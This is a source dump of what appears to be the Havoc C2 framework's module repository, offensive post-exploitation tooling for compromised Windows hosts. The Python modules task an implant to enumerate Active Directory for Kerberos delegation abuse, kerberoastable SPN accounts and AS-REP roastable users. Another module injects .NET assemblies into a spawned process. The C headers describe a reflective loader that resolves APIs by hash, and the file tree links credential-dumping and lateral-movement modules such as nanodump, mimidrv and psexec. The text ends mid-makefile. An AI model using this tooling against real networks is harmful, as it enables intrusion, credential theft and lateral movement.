├── .github └── workflows │ └── build.yml ├── .gitmodules ├── Bofbelt ├── ObjectFiles │ ├── dir.x64.o │ ├── dir.x86.o │ ├── enumlocalsessions.x64.o │ ├── enumlocalsessions.x86.o │ ├── env.x64.o │ ├── env.x86.o │ ├── ipconfig.x64.o │ ├── ipconfig.x86.o │ ├── ldapsearch.x64.o │ ├── ldapsearch.x86.o │ ├── netuserenum.x64.o │ ├── netuserenum.x86.o │ ├── reg_query.x64.o │ ├── reg_query.x86.o │ ├── tasklist.x64.o │ ├── tasklist.x86.o │ ├── uptime.x64.o │ ├── uptime.x86.o │ ├── whoami.x64.o │ ├── whoami.x86.o │ ├── windowlist.x64.o │ ├── windowlist.x86.o │ ├── wmi_query.x64.o │ └── wmi_query.x86.o ├── bofbelt.py ├── browser.json ├── defensive.json └── interesting.json ├── Delegation ├── bin │ ├── ldapsearch.x64.o │ └── ldapsearch.x86.o └── delegation.py ├── Domaininfo ├── Domaininfo.o └── Domaininfo.py ├── InvokeAssembly ├── CMakeLists.txt ├── bin │ └── InvokeAssembly.x64.dll ├── include │ ├── DModule.h │ ├── InvokeAssembly.h │ ├── KaynLdr.h │ ├── Native.h │ ├── Parser.h │ └── Win32.h ├── invokeassembly.py ├── makefile └── src │ ├── DllMain.c │ ├── InvokeAssembly.c │ ├── KaynLdr.c │ ├── Parser.c │ ├── Util.s │ └── Win32.c ├── Jump-exec ├── DCOM │ └── dcom.x86.o ├── Psexec │ ├── beacon.h │ ├── makefile │ ├── psexec.c │ ├── psexec.py │ ├── psexec.x64.o │ └── psexec.x86.o ├── ScShell │ ├── beacon.h │ ├── makefile │ ├── scshell.c │ ├── scshell.py │ ├── scshell.x64.o │ └── scshell.x86.o ├── WMI │ ├── EventSub │ │ ├── bin │ │ │ └── EventSub.x64.o │ │ ├── include │ │ │ └── beacon.h │ │ ├── makefile │ │ └── source │ │ │ └── WMI-EventSub.cpp │ ├── ProcCreate │ │ ├── bin │ │ │ └── ProcCreate.x64.o │ │ ├── include │ │ │ └── beacon.h │ │ ├── makefile │ │ └── source │ │ │ └── WMI-ProcessCreate.cpp │ ├── makefile │ └── wmi.py └── makefile ├── Migrate └── auto_migrate.py ├── NoConsolation ├── bin │ ├── NoConsolation.x64.o │ └── NoConsolation.x86.o ├── makefile └── no-consolation.py ├── Packer └── packer.py ├── PowerPick ├── CMakeLists.txt ├── bin │ └── PowerPick.x64.dll ├── include │ ├── DModule.h │ ├── InvokeAssembly.h │ ├── KaynLdr.h │ ├── Native.h │ ├── Parser.h │ ├── PowershellRunner.h │ └── Win32.h ├── makefile ├── powerpick.py └── src │ ├── DllMain.c │ ├── InvokeAssembly.c │ ├── KaynLdr.c │ ├── Parser.c │ ├── Util.s │ └── Win32.c ├── README.md ├── RemoteOps ├── RemoteOps.py ├── bin │ ├── adcs_request.x64.o │ ├── adcs_request.x86.o │ ├── adduser.x64.o │ ├── adduser.x86.o │ ├── addusertogroup.x64.o │ ├── addusertogroup.x86.o │ ├── enableuser.x64.o │ ├── enableuser.x86.o │ ├── reg_delete.x64.o │ ├── reg_delete.x86.o │ ├── reg_save.x64.o │ ├── reg_save.x86.o │ ├── reg_set.x64.o │ ├── reg_set.x86.o │ ├── sc_create.x64.o │ ├── sc_create.x86.o │ ├── sc_delete.x64.o │ ├── sc_delete.x86.o │ ├── sc_description.x64.o │ ├── sc_description.x86.o │ ├── sc_start.x64.o │ ├── sc_start.x86.o │ ├── sc_stop.x64.o │ ├── sc_stop.x86.o │ ├── setuserpass.x64.o │ └── setuserpass.x86.o └── makefile ├── SamDump ├── README.md ├── makefile ├── regdump.x64.o ├── regdump.x86.o ├── samdump.py └── source │ ├── beacon.h │ ├── common.h │ ├── entry.c │ ├── entry_x64.o │ └── entry_x86.o ├── SituationalAwareness ├── ObjectFiles │ ├── adcs_enum.x64.o │ ├── adcs_enum.x86.o │ ├── arp.x64.o │ ├── arp.x86.o │ ├── cacls.x64.o │ ├── cacls.x86.o │ ├── dir.x64.o │ ├── dir.x86.o │ ├── driversigs.x64.o │ ├── driversigs.x86.o │ ├── enum_filter_driver.x64.o │ ├── enum_filter_driver.x86.o │ ├── enumlocalsessions.x64.o │ ├── enumlocalsessions.x86.o │ ├── env.x64.o │ ├── env.x86.o │ ├── get-netsession.x64.o │ ├── get-netsession.x86.o │ ├── get_password_policy.x64.o │ ├── get_password_policy.x86.o │ ├── ipconfig.x64.o │ ├── ipconfig.x86.o │ ├── ldapsearch.x64.o │ ├── ldapsearch.x86.o │ ├── list_firewall_rules.x64.o │ ├── list_firewall_rules.x86.o │ ├── listdns.x64.o │ ├── listdns.x86.o │ ├── locale.x64.o │ ├── locale.x86.o │ ├── netgroup.x64.o │ ├── netgroup.x86.o │ ├── netlocalgroup.x64.o │ ├── netlocalgroup.x86.o │ ├── netshares.x64.o │ ├── netshares.x86.o │ ├── netstat.x64.o │ ├── netstat.x86.o │ ├── netuptime.x64.o │ ├── netuptime.x86.o │ ├── netuser.x64.o │ ├── netuser.x86.o │ ├── netuserenum.x64.o │ ├── netuserenum.x86.o │ ├── netview.x64.o │ ├── netview.x86.o │ ├── nslookup.x64.o │ ├── nslookup.x86.o │ ├── quser.x64.o │ ├── quser.x86.o │ ├── reg_query.x64.o │ ├── reg_query.x86.o │ ├── resources.x64.o │ ├── resources.x86.o │ ├── routeprint.x64.o │ ├── routeprint.x86.o │ ├── sc_enum.x64.o │ ├── sc_enum.x86.o │ ├── sc_qc.x64.o │ ├── sc_qc.x86.o │ ├── sc_qdescription.x64.o │ ├── sc_qdescription.x86.o │ ├── sc_qfailure.x64.o │ ├── sc_qfailure.x86.o │ ├── sc_qtriggerinfo.x64.o │ ├── sc_qtriggerinfo.x86.o │ ├── sc_query.x64.o │ ├── sc_query.x86.o │ ├── schtasksenum.x64.o │ ├── schtasksenum.x86.o │ ├── schtasksquery.x64.o │ ├── schtasksquery.x86.o │ ├── tasklist.x64.o │ ├── tasklist.x86.o │ ├── uptime.x64.o │ ├── uptime.x86.o │ ├── whoami.x64.o │ ├── whoami.x86.o │ ├── windowlist.x64.o │ ├── windowlist.x86.o │ ├── wmi_query.x64.o │ └── wmi_query.x86.o ├── SituationalAwareness.py └── makefile ├── Template ├── CMakeLists.txt ├── bin │ └── Template.x64.dll ├── include │ ├── DModule.h │ ├── KaynLdr.h │ ├── Native.h │ ├── Parser.h │ └── Win32.h ├── makefile ├── src │ ├── DllMain.c │ ├── KaynLdr.c │ ├── Parser.c │ ├── Util.s │ └── Win32.c └── template.py ├── makefile ├── mimidrv ├── dist │ └── mimidrv.x64.o ├── include │ ├── beacon.h │ └── entry.h ├── makefile ├── mimidrv.py └── source │ └── entry.c ├── nanodump ├── bin │ ├── nanodump.x64.o │ ├── nanodump.x86.o │ ├── nanodump_ppl_dump.x64.dll │ ├── nanodump_ppl_dump.x64.o │ ├── nanodump_ppl_medic.x64.dll │ ├── nanodump_ppl_medic.x64.o │ ├── nanodump_ssp.x64.dll │ └── nanodump_ssp.x64.o ├── makefile └── nanodump.py └── nanorobeus ├── bin ├── nanorobeus.x64.o └── nanorobeus.x86.o ├── include ├── base64.h ├── beacon.h ├── bofdefs.h ├── common.h ├── kerberoast.h ├── klist.h ├── krb5.h ├── luid.h ├── msasn1.h ├── ptt.h ├── purge.h ├── sessions.h └── tgtdeleg.h ├── makefile ├── nanorobeus.py └── src ├── base64.c ├── common.c ├── entry.c ├── kerberoast.c ├── klist.c ├── krb5.c ├── luid.c ├── ptt.c ├── purge.c ├── sessions.c └── tgtdeleg.c /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | name: build 2 | 3 | on: [pull_request, push] 4 | 5 | jobs: 6 | build: 7 | runs-on: ubuntu-latest 8 | 9 | steps: 10 | - name: Checkout Repository 11 | uses: actions/checkout@v2 12 | 13 | - name: Set up MinGW 14 | uses: egor-tensin/setup-mingw@v2 15 | with: 16 | platform: x64 17 | 18 | - name: apt update 19 | run: sudo apt-get update 20 | 21 | - name: Install pefile 22 | run: sudo apt-get -y install python3-pefile 23 | 24 | - name: Install nasm 25 | run: sudo apt-get -y install nasm 26 | 27 | - name: Build BOFs 28 | run: make 29 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "RemoteOps/CS-Remote-OPs-BOF"] 2 | path = RemoteOps/CS-Remote-OPs-BOF 3 | url = https://github.com/trustedsec/CS-Remote-OPs-BOF 4 | 5 | [submodule "NoConsolation/No-Consolation"] 6 | path = NoConsolation/No-Consolation 7 | url = https://github.com/fortra/No-Consolation 8 | 9 | [submodule "nanodump/nanodump"] 10 | path = nanodump/nanodump 11 | url = https://github.com/fortra/nanodump 12 | 13 | [submodule "SituationalAwareness/CS-Situational-Awareness-BOF"] 14 | path = SituationalAwareness/CS-Situational-Awareness-BOF 15 | url = https://github.com/trustedsec/CS-Situational-Awareness-BOF 16 | 17 | -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/dir.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/dir.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/dir.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/dir.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/enumlocalsessions.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/enumlocalsessions.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/enumlocalsessions.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/enumlocalsessions.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/env.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/env.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/env.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/env.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/ipconfig.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/ipconfig.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/ipconfig.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/ipconfig.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/ldapsearch.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/ldapsearch.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/ldapsearch.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/ldapsearch.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/netuserenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/netuserenum.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/netuserenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/netuserenum.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/reg_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/reg_query.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/reg_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/reg_query.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/tasklist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/tasklist.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/tasklist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/tasklist.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/uptime.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/uptime.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/uptime.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/uptime.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/whoami.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/whoami.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/whoami.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/whoami.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/windowlist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/windowlist.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/windowlist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/windowlist.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/wmi_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/wmi_query.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/wmi_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/wmi_query.x86.o -------------------------------------------------------------------------------- /Bofbelt/browser.json: -------------------------------------------------------------------------------- 1 | {"chrome": "Google Chrome","iexplore": "Microsoft Internet Explorer","microsoftedge": "Microsoft Edge","firefox": "Mozilla Firefox","brave": "Brave Browser","opera": "Opera Browser"} -------------------------------------------------------------------------------- /Bofbelt/interesting.json: -------------------------------------------------------------------------------- 1 | {"cmrcservice": "Configuration Manager Remote Control Service","ftp": "Misc. FTP client","lmiguardian": "LogMeIn Reporter","logmeinsystray": "LogMeIn System Tray","ramaint": "LogMeIn maintenance sevice","mmc": "Microsoft Management Console","putty": "Putty SSH client","pscp": "Putty SCP client","psftp": "Putty SFTP client","puttytel": "Putty Telnet client","plink": "Putty CLI client","pageant": "Putty SSH auth agent","kitty": "Kitty SSH client","telnet": "Misc. Telnet client","securecrt": "SecureCRT SSH/Telnet client","teamviewer": "TeamViewer","tv_x64": "TeamViewer x64 remote control","tv_w32": "TeamViewer x86 remote control","keepass": "KeePass password vault","mstsc": "Microsoft RDP client","vnc": "Possible VNC client","powershell": "PowerShell host process","cmd": "Command Prompt","kaseya.agentendpoint.exe": "Command Prompt"} -------------------------------------------------------------------------------- /Delegation/bin/ldapsearch.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Delegation/bin/ldapsearch.x64.o -------------------------------------------------------------------------------- /Delegation/bin/ldapsearch.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Delegation/bin/ldapsearch.x86.o -------------------------------------------------------------------------------- /Delegation/delegation.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | import re 3 | 4 | def get_delegation( demonID, *params ): 5 | TaskID : str = None 6 | demon : Demon = None 7 | packer = Packer() 8 | demon = Demon( demonID ) 9 | 10 | del_query = { 11 | 'constrained': '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=16777216))', 12 | 'unconstrained': '(&(objectClass=computer)(primarygroupid=515)(userAccountControl:1.2.840.113556.1.4.803:=524288))', 13 | 'rbcd': '(&(msDS-AllowedToActOnBehalfOfOtherIdentity=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' 14 | } 15 | 16 | del_attrs = { 17 | 'constrained': 'sAMAccountName,msDS-AllowedToDelegateTo', 18 | 'unconstrained': 'sAMAccountName', 19 | 'rbcd': 'sAMAccountName' 20 | } 21 | 22 | num_params = len(params) 23 | query = '' 24 | attributes = '' 25 | result_limit = 0 26 | hostname = '' 27 | domain = '' 28 | 29 | if num_params < 1: 30 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" ) 31 | return False 32 | 33 | if num_params > 1: 34 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" ) 35 | return False 36 | 37 | if params[ 0 ].lower() not in del_query: 38 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Wrong first parameter" ) 39 | return False 40 | 41 | query = del_query[ params[ 0 ].lower() ] 42 | attrs = del_attrs[ params[ 0 ].lower() ] 43 | 44 | if num_params >= 2: 45 | attributes = params[ 1 ] 46 | 47 | # not used 48 | if num_params >= 3: 49 | result_limit = params[ 2 ] 50 | 51 | if num_params >= 4: 52 | hostname = params[ 3 ] 53 | 54 | if num_params >= 5: 55 | domain = params[ 4 ] 56 | 57 | packer.addstr(query) 58 | packer.addstr(attrs) 59 | packer.adduint32(result_limit) 60 | packer.addstr(hostname) 61 | packer.addstr(domain) 62 | 63 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to run ldap query" ) 64 | 65 | demon.InlineExecute( TaskID, "go", f"bin/ldapsearch.{demon.ProcessArch}.o", packer.getbuffer(), False ) 66 | 67 | return TaskID 68 | 69 | def get_spns( demonID, *params ): 70 | TaskID : str = None 71 | demon : Demon = None 72 | packer = Packer() 73 | demon = Demon( demonID ) 74 | 75 | num_params = len(params) 76 | query = '(&(samAccountType=805306368)(!samAccountName=krbtgt)(serviceprincipalname=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' 77 | attributes = 'sAMAccountName,servicePrincipalName' 78 | result_limit = 0 79 | hostname = '' 80 | domain = '' 81 | 82 | if num_params > 0: 83 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" ) 84 | return False 85 | 86 | # not used 87 | if num_params >= 2: 88 | attributes = params[ 1 ] 89 | 90 | if num_params >= 3: 91 | result_limit = params[ 2 ] 92 | 93 | if num_params >= 4: 94 | hostname = params[ 3 ] 95 | 96 | if num_params >= 5: 97 | domain = params[ 4 ] 98 | 99 | packer.addstr(query) 100 | packer.addstr(attributes) 101 | packer.adduint32(result_limit) 102 | packer.addstr(hostname) 103 | packer.addstr(domain) 104 | 105 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to run ldap query" ) 106 | 107 | demon.InlineExecute( TaskID, "go", f"bin/ldapsearch.{demon.ProcessArch}.o", packer.getbuffer(), False ) 108 | 109 | return TaskID 110 | 111 | 112 | def get_asrep( demonID, *params ): 113 | TaskID : str = None 114 | demon : Demon = None 115 | packer = Packer() 116 | demon = Demon( demonID ) 117 | 118 | num_params = len(params) 119 | query = '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' 120 | attributes = 'sAMAccountName' 121 | result_limit = 0 122 | hostname = '' 123 | domain = '' 124 | 125 | if num_params > 1: 126 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" ) 127 | return False 128 | 129 | # not used 130 | if num_params >= 2: 131 | attributes = params[ 1 ] 132 | 133 | if num_params >= 3: 134 | result_limit = params[ 2 ] 135 | 136 | if num_params >= 4: 137 | hostname = params[ 3 ] 138 | 139 | if num_params >= 5: 140 | domain = params[ 4 ] 141 | 142 | packer.addstr(query) 143 | packer.addstr(attributes) 144 | packer.adduint32(result_limit) 145 | packer.addstr(hostname) 146 | packer.addstr(domain) 147 | 148 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to run ldap query" ) 149 | 150 | demon.InlineExecute( TaskID, "go", f"bin/ldapsearch.{demon.ProcessArch}.o", packer.getbuffer(), False ) 151 | 152 | return TaskID 153 | 154 | 155 | RegisterCommand( get_delegation, "", "get-delegation", "Enumerate a given domain for different types of abusable Kerberos Delegation settings.", 0, "[Constrained,Unconstrained,RBCD]", "constrained" ) 156 | RegisterCommand( get_spns, "", "get-spns", "Enumerate a given domain for user accounts with SPNs.", 0, "", "" ) 157 | RegisterCommand( get_asrep, "", "get-asrep", "Enumerate a given domain for user accounts with ASREP.", 0, "", "" ) 158 | -------------------------------------------------------------------------------- /Domaininfo/Domaininfo.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Domaininfo/Domaininfo.o -------------------------------------------------------------------------------- /Domaininfo/Domaininfo.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand 2 | from struct import pack, calcsize 3 | 4 | def dcenum(demonID, *param): 5 | TaskID : str = None 6 | demon : Demon = None 7 | 8 | demon = Demon( demonID ) 9 | 10 | if demon.ProcessArch == "x86": 11 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" ) 12 | return False 13 | 14 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to enumerate domain information using Active Directory Domain Services" ) 15 | 16 | demon.InlineExecute( TaskID, "go", "Domaininfo.o", b'', False ) 17 | 18 | return TaskID 19 | 20 | RegisterCommand( dcenum, "", "dcenum", "enumerate domain information using Active Directory Domain Services", 0, "", "" ) 21 | -------------------------------------------------------------------------------- /InvokeAssembly/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required( VERSION 3.19 ) 2 | project( InvokeAssembly C ) 3 | 4 | set( PROJECT_NAME InvokeAssembly ) 5 | 6 | # set compiler settings 7 | set( CMAKE_C_STANDARD 11 ) 8 | set( CMAKE_C_COMPILER x86_64-w64-mingw32-gcc ) 9 | 10 | # adding demon sources 11 | include_directories( include ) 12 | 13 | set( COMMON_SOURCE 14 | src/Win32.c 15 | src/KaynLdr.c 16 | src/DllMain.c 17 | src/Parser.c 18 | src/InvokeAssembly.c 19 | ) 20 | 21 | 22 | # add compiled demons 23 | add_executable( ${PROJECT_NAME} ${COMMON_SOURCE} ) 24 | -------------------------------------------------------------------------------- /InvokeAssembly/bin/InvokeAssembly.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/InvokeAssembly/bin/InvokeAssembly.x64.dll -------------------------------------------------------------------------------- /InvokeAssembly/include/DModule.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | 6 | typedef struct _INSTANCE { 7 | 8 | struct { 9 | 10 | WIN32_FUNC( printf ) 11 | WINBASEAPI HRESULT ( WINAPI *CLRCreateInstance ) ( REFCLSID clsid, REFIID riid, LPVOID* ppInterface ); 12 | 13 | } Win32; 14 | 15 | struct { 16 | 17 | PVOID Msvcrt; 18 | PVOID Mscoree; 19 | 20 | } Modules; 21 | 22 | } INSTANCE, *PINSTANCE; 23 | 24 | extern INSTANCE Instance; 25 | 26 | VOID ModuleInit(); 27 | VOID ModuleMain(); -------------------------------------------------------------------------------- /InvokeAssembly/include/KaynLdr.h: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | * Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #ifndef KAYNLDR_KAYNLDR_H 7 | #define KAYNLDR_KAYNLDR_H 8 | 9 | #define _NO_NTDLL_CRT_ 10 | 11 | #include 12 | #include 13 | 14 | #define DLL_QUERY_HMODULE 6 15 | 16 | #define HASH_KEY 5381 17 | 18 | #ifdef _WIN64 19 | #define PPEB_PTR __readgsqword( 0x60 ) 20 | #else 21 | #define PPEB_PTR __readgsqword( 0x30 ) 22 | #endif 23 | 24 | #define MemCopy __builtin_memcpy 25 | #define NTDLL_HASH 0x70e61753 26 | 27 | #define SYS_LDRLOADDLL 0x9e456a43 28 | #define SYS_NTALLOCATEVIRTUALMEMORY 0xf783b8ec 29 | #define SYS_NTPROTECTEDVIRTUALMEMORY 0x50e92888 30 | 31 | #define DLLEXPORT __declspec( dllexport ) 32 | #define WIN32_FUNC( x ) __typeof__( x ) * x; 33 | 34 | #define U_PTR( x ) ( ( UINT_PTR ) x ) 35 | #define C_PTR( x ) ( ( LPVOID ) x ) 36 | 37 | typedef struct { 38 | 39 | struct { 40 | WIN32_FUNC( LdrLoadDll ); 41 | WIN32_FUNC( NtAllocateVirtualMemory ) 42 | WIN32_FUNC( NtProtectVirtualMemory ) 43 | } Win32; 44 | 45 | struct { 46 | PVOID Ntdll; 47 | } Modules ; 48 | 49 | } KAYNINSTANCE, *PKAYNINSTANCE ; 50 | 51 | LPVOID KaynCaller(); 52 | 53 | typedef struct { 54 | WORD offset :12; 55 | WORD type :4; 56 | } *PIMAGE_RELOC; 57 | 58 | PVOID KGetModuleByHash( DWORD hash ); 59 | PVOID KGetProcAddressByHash( PKAYNINSTANCE Instance, PVOID DllModuleBase, DWORD FunctionHash, DWORD Ordinal ); 60 | PVOID KLoadLibrary( PKAYNINSTANCE Instance, LPSTR Module ); 61 | 62 | VOID KResolveIAT( PKAYNINSTANCE Instance, PVOID KaynImage, PVOID IatDir ); 63 | VOID KReAllocSections( PVOID KaynImage, PVOID ImageBase, PVOID Dir ); 64 | 65 | DWORD KHashString( LPVOID String, SIZE_T Size ); 66 | SIZE_T KStringLengthA( LPCSTR String ); 67 | SIZE_T KStringLengthW( LPCWSTR String ); 68 | VOID KMemSet( PVOID Destination, INT Value, SIZE_T Size ); 69 | SIZE_T KCharStringToWCharString( PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed ); 70 | 71 | #endif 72 | -------------------------------------------------------------------------------- /InvokeAssembly/include/Parser.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | typedef struct { 5 | PCHAR original; 6 | PCHAR buffer; 7 | UINT32 length; 8 | } PARSER, *PPARSER ; 9 | 10 | VOID ParserNew( PPARSER parser, PCHAR buffer ); 11 | INT ParserGetInt32( PPARSER parser); 12 | PCHAR ParserGetBytes( PPARSER parser, PINT size); -------------------------------------------------------------------------------- /InvokeAssembly/include/Win32.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed); -------------------------------------------------------------------------------- /InvokeAssembly/invokeassembly.py: -------------------------------------------------------------------------------- 1 | 2 | from havoc import Demon, RegisterCommand 3 | 4 | def InvokeAssembly( demonID, *param ): 5 | TaskID : str = None 6 | demon : Demon = None 7 | Assembly : str = None 8 | packer = Packer() 9 | 10 | demon = Demon( demonID ) 11 | 12 | if demon.ProcessArch == 'x86': 13 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" ) 14 | return False 15 | 16 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon spawn and inject an assembly executable" ) 17 | 18 | if len( param ) < 2: 19 | demon.ConsoleWrite(demon.CONSOLE_ERROR, "Not enough arguments") 20 | return 21 | 22 | try: 23 | Assembly = open( param[ 0 ], 'rb' ) 24 | 25 | packer.addstr( "DefaultAppDomain" ) 26 | packer.addstr( "v4.0.30319" ) 27 | packer.addstr( str(Assembly.read()) ) 28 | packer.addstr( " " + ''.join( param[ 1: ] ) ) 29 | 30 | except OSError: 31 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Failed to open assembly file: " + param[ 0 ] ) 32 | return 33 | 34 | arg = packer.getbuffer() 35 | 36 | demon.DllSpawn( TaskID, f"bin/InvokeAssembly.{demon.ProcessArch}.dll", arg ) 37 | 38 | return TaskID 39 | 40 | RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a seperate process", 0, "[/path/to/assembl.exe] (args)", "/tmp/Seatbelt.exe -group=user" ) 41 | -------------------------------------------------------------------------------- /InvokeAssembly/makefile: -------------------------------------------------------------------------------- 1 | MAKEFLAGS += -s 2 | 3 | NAME = InvokeAssembly 4 | 5 | COMPILER_x86 = i686-w64-mingw32-gcc 6 | COMPILER_x64 = x86_64-w64-mingw32-gcc 7 | 8 | CFLAGS = -Os 